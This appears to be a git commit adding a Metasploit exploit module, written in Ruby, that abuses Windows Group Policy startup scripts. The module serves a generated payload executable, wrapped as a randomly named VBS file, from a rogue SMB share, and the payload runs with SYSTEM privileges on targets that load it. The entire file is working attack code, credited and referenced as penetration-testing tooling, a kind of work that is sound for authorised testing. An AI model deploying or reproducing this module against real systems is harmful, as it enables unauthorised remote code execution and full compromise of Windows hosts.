Add module to exploit dangerous group policy startup scripts

2015-04-10 13:01:50 -05:00 · 2015-04-10 13:01:50 -05:00 · ab944b1897
parent 4419c1c728
commit ab944b1897
1 changed files with 73 additions and 0 deletions
--- a/modules/exploits/windows/smb/group_policy_startup.rb
+++ b/modules/exploits/windows/smb/group_policy_startup.rb
@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Group Policy Startup Script From Shared Resource',
+      'Description'   => %q{
+        This is a general-purpose module for exploiting systems with Windows Group Policy
+        configured to load VBS startup scripts from remote locations. This module runs a
+        SMB shared resource that will provide a payload through an VBS file. The payload
+        will be executed with SYSTEM privileges on the target loading it through Windows
+        Group Policy. Have into account which the attacker still needs to the redirect the
+        target traffic to the fake SMB share to exploit it successfully.
+      },
+      'Author'      =>
+        [
+          'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba
+          'juan vazquez' # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],
+          ['URL', 'https://github.com/GDSSecurity/BadSamba']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => true,
+      'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 04 2015'
+    ))
+
+    register_options(
+      [
+        OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])
+      ], self.class)
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def setup
+    super
+
+    exe = generate_payload_exe
+    self.file_contents = Msf::Util::EXE.to_exe_vbs(exe)
+    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
+    print_status("File available on #{unc}...")
+  end
+
+end